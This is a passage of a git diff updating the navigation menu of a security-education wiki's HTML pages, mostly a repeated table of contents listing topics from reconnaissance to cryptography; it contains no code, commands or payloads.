      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -207,22 +207,6 @@

Introduction - - diff --git a/docs/Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html b/docs/Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html index 52a8c33d..c7d6090d 100644 --- a/docs/Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html +++ b/docs/Cryptography/Public-Key Cryptography/Security Definitions/Perfect Secrecy.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
+
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. Directory Traversal
      12. HTTP Parameter Pollution
      13. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
          3. Classless Inter-Domain Routing (CIDR)
          4. IPv4 Datagrams
        3. Internet Protocol v6 (IPv6)
      3. WLAN (IEEE 802.11)
        1. Management Frames
          1. Action Frames
          2. Association Frames
          3. Authentication Frames
          4. Discovery Frames
        3. Data Frames
        4. Control Frames
        5. Authentication & Association
        6. WiFi Protected Access (WPA)
        7. Encryption & Integrity
      5. Domain Name System (DNS)
        1. The in-addr.arpa Domain
        2. The Domain Name System
        3. DNS Protocol
      7. Simple Network Management Protocol (SNMP)
      8. Leightweight Directory Access Protocol (LDAP)
      9. Server Message Block (SMB)
      10. Network Time Protocol (NTP)
      11. File Transfer Protocol (FTP)
      12. Address Resolution Protocol (ARP)
      13. Ethernet (IEEE 802.3)
    3. Networks
    4. The TCP-IP Suite and the OSI Model
      1. (1) The Physical Layer
      2. (2) The Datalink Layer
    6. Network Address Translation (NAT)
    7. Subnetting
    8. VLANs
@@ -175,22 +175,6 @@

Introduction - - diff --git a/docs/Cryptography/Public-Key Cryptography/Security Definitions/index.html b/docs/Cryptography/Public-Key Cryptography/Security Definitions/index.html index 4656e30b..dd379218 100644 --- a/docs/Cryptography/Public-Key Cryptography/Security Definitions/index.html +++ b/docs/Cryptography/Public-Key Cryptography/Security Definitions/index.html @@ -100,7 +100,7 @@
-
  1. Cyberclopaedia
    1. Contributing
    2. License
  3. Reconnaissance
    1. Enumeration
      1. Port Scanning
        1. SYN Scan
        2. TCP Connect Scan
        3. FIN, NULL & XMAS Scans
      3. Web Server Enumeration (80, 443)
      4. DNS Server Enumeration (53)
      5. FTP Enumeration (21)
      6. SNMP Enumeration (161)
      7. LDAP Enumeration (389, 636, 3268, 3269)
    3. OSINT
      1. Tools
        1. theHarvester
        2. recon-ng
      3. Domain Name Enumeration
      4. Harvesting E-Mails
      5. Instagram User Enumeration
      6. Whois Enumeration
      7. Google Dorks
  5. Exploitation
    1. Binary Exploitation
      1. Heap Exploitation
        1. Use After Free (UAF)
      3. Stack Exploitation
        1. Format String Vulnerabilities
        2. Protection Mechanisms
        3. Return to _dl_resolve
        4. Return-oriented programming (ROP)
        5. Sigreturn-oriented Programming (SROP)
        6. Buffer Overflows
    3. Web
      1. SQL Injection
        1. Finding SQLi
        2. Defences
        3. Introduction
        4. Union injections
        5. Cheatsheets
      3. Template Injection
      4. Open Redirect
      5. PHP Object Injection
      6. HTTP Response Splitting
      7. CRLF Injection
      8. Cross-Site Scripting (XSS)
      9. Cross-Site Request Forgery
      10. WebSockets
      11. HTTP Parameter Pollution
      12. Host Header Injection
    5. Windows
      1. SCF File Attacks
    7. DNS
      1. DNS Traffic Amplification
      2. DNS Cache Poisoning
  7. Post Exploitation
    1. Privilege Escalation
      1. Linux
        1. Abusing SUID & SGID Binaries
        2. Kernel Exploits
        3. Sudo Shell Escape Sequences
        4. NFS Root Squashing
        5. Abusing Linux Capabilities
        6. Sudo Escalation via LD_PRELOAD
      3. Windows
        1. Misconfigured Services
          1. Unquoted Service Paths
          2. Weak Registry Permissions
          3. Insecure Service Permissions
          4. Insecure Service Executable Permissions
        3. AutoRun Programmes
        4. AlwaysInstallElevated Group Policy
        5. Kernel Exploits
        6. Scheduled Tasks
        7. Bypassing UAC
        8. Startup Applications
        9. Stored Credentials
        10. Token Impersonation
    3. Enumeration
      1. Linux
        1. Hunting Down Sensitive Files
        2. System Enumeration
        3. User Enumeration
        4. Network Enumeration
      3. Windows
        1. System Enumeration
    5. Pivoting
      1. Tunneling with Chisel
      2. SSH Tunneling
    7. Active Directory (AD)
      1. Domain Enumeration with PowerView
      2. Domain Data Enumeration with Bloodhound
  9. System Internals
    1. Linux
      1. Processes
      2. File System
      3. Command Line
    3. Windows
      1. Active Directory (AD)
        1. Contacts
        2. Terminology
        3. Users
        4. Groups
        5. Domain Controllers
        6. Computers
      3. File System
  11. Reverse Engineering
    1. Program Anatomy
      1. The Stack
      2. Instructions
      3. The Heap
      4. Registers
    3. Reverse Engineering with Ghidra
      1. Creating a Project and Loading a Binary
      2. Initial Analysis
    5. Reverse Engineering with radare2
      1. Analysis
      2. Strings
      3. Binary Info
      4. Flags
      5. Seeking
    7. Assembly Programming
      1. x86-64
        1. Variables
        2. Data Representation
        3. Addressing Modes
        4. Memory
        5. Registers
        6. Instruction Set
    9. Binary Formats
      1. PE
        1. Relocations
        2. NT Headers
        3. Sections
        4. The Rich Header
        5. The DOS Header
        6. The DOS Stub
      3. ELF
        1. Symbols
        2. Relocations
        3. Sections
        4. Segments
        5. The ELF Header
        6. Dynamic Linking
      5. Reverse Engineering Android Applications
    11. Assembly
    12. Basic Reverse Engineering using objdump, strace, and ltrace
  13. Hardware Hacking
    1. Wireless Attacks
      1. Hacking WPA Networks
      2. Deauth Attack
      3. Hacking WEP Networks
  15. Cryptography
    1. Hash Functions
      1. Birthday Attacks
      2. Merkle-Damgård Transform
      3. Davies-Meyer Transform
      4. Security Definitions
    3. Public-Key Cryptography
      1. Security Definitions
        1. Perfect Secrecy
        2. Chosen-Plaintext Attack (CPA)
      3. Mathematical Prerequisites
    5. Primitives
      1. Pseudorandom Permutations (PRPs)
      2. Pseudorandom Generators (PRGs)
      3. Pseudorandom Function Generators (PRFGs)
    7. Private-Key Cryptography
      1. Stream Ciphers
        1. Hardware-Oriented Stream Ciphers
          1. Grain-128a
      3. Security Definitions
        1. Ciphertext-Only Attack (COA)
          1. Perfect Secrecy
          2. Semantic Security
        3. Chosen Plaintext Attack (CPA)
        4. Randomness
        5. Chosen Ciphertext Attack (CCA)
        6. P vs NP
        7. Ciphertext Integrity (CI)
      5. Block Ciphers
        1. Modes of Operation
          1. Counter (CTR) Mode
          2. Cipher Block Chaining (CBC) Mode
          3. Electronic Cookbook (ECB) Mode
        3. Advanced Encryption Standard (AES)
        4. Padding Oracle Attack
        5. Encrypting Non-Conforming Messages
      7. Message Authentication Codes (MACs)
        1. Hash-Based MACs (HMAC)
        2. Fixed-Length MACs
      9. One-Time Passwords
        1. HMAC-Based One-Time Passwords (HOTP)
        2. Time-Based One-Time Passwords (TOTP)
      11. Authenticated Encryption
      12. One-Time Pad
    9. Integrity Verification
      1. Merkle Trees
    11. Key Management
      1. Key Exchange
        1. Security Definitions
        2. Diffie-Hellman Key Exchange
    13. Breaking Classical Cryptrography
    14. Mathematical Prerequisites
    15. Computer Science Prerequisites
  17. Networking
    1. Protocols
      1. Internet Protocol (IP)
        1. Internet Protocol v4 (IPv4)
          1. Subnetting
          2. Classful Addressing
